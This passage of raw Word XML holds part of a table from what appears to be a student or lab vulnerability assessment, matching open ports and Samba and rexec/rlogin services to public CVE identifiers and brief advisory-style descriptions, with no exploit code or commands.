            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>netbios-ssn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3326C490" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>smbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3.X - 4.X (workgroup: WORKGROUP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="714FA299" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2015-5252,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="171DC311" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2013-4124</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BD123D6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5158BF94" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Allows remote attackers to bypass intended file-access restrictions via a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>symlink</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> that points outside of a share. As part of the Spotlight protocol, Samba discloses the server-side absolute path of </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">shares, files, and directories in the results for search queries. Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54BA6DE7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F17084B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Despite, there are only 3 CVE and no more information, in my opinion, port 139 and port 445, I mean those vulnerabilities are almost the same.  So, the description of 455 port also relate to 139 port service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="05471C4C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="53F9318C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="19EEB87B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="762805D8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>netbios-ssn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="78753463" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>smbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3.0.20-Debian (workgroup: WORKGROUP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4367C329" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2007-2447,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EB6C5D8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2007-2444,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44D0FA63" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CVE-2006-3403,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2007-0452,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="202278D1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65819D06" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SamrChangePassword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> function, when the "username map script" </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>smb.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> option is </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>enabled, and</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3871EABD" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Allows remote attackers to cause a denial of service (memory consumption) via </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>a large number of</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> share connection requests.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="403F5998" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1415359A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0CB60BF2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>512</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3EF502D4" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>exec?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="587A5688" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="68567F3D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="595C2D36" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="4740405C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="595CE20D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B58F1A6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>513</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E3B60D7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46FF1BC1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">OpenBSD or Solaris </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
